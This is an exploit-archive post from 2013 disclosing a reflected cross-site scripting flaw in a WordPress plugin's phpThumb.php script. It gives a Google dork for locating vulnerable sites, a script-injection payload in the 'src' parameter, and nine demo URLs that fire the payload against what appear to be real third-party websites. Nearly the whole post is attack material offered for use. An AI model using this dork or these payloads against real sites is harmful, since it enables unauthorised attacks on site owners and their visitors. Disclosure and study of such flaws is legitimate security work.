Home / exploitsPDF  

Wordpress fresh-page plugin site scripting Vulnerability

Posted on 04 November 2013

/ /  / ____|  / ____|
   V /  | (___   | (___
   > <    \___    \___ 
  / .    ____) |  ____) |
 /_/ \_ |_____/  |_____/
====================================================================
# Exploit Title : Wordpress fresh-page plugin site scripting Vulnerability

# Exploit Author : Ashiyane Digital Security Team

# Vendor Homepage : http://wordpress.org

# Google Dork :
inurl:wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php

# Date: 2013/11/02

# Tested on: Windows 7
#
------------------------------------------------
#
# Exploit :
#
# Location : www.Site.com/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src=[xss]
#
# Method : Get
#
# Script For Test : "/><script>alert(1);</script>
#
------------------------------------------------
#
# Demo:
#
# http://www.arXXibel.ru/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://lsgroXXup.org/building/en/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://feelinnveniXXce.com/zh/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://floortoceilinXXghandyman.com/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://intentionaXl.Xco.uk/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://meiasrikaXcom.br/site/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://www.drtv.XXco.uk/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://www.thXXebuildersandthebutchers.com/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
# http://www.ilXveyes.net/wp-content/plugins/fresh-page/thirdparty/phpthumb/phpThumb.php?src="/><script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################

 

TOP

Malware :

Exploits :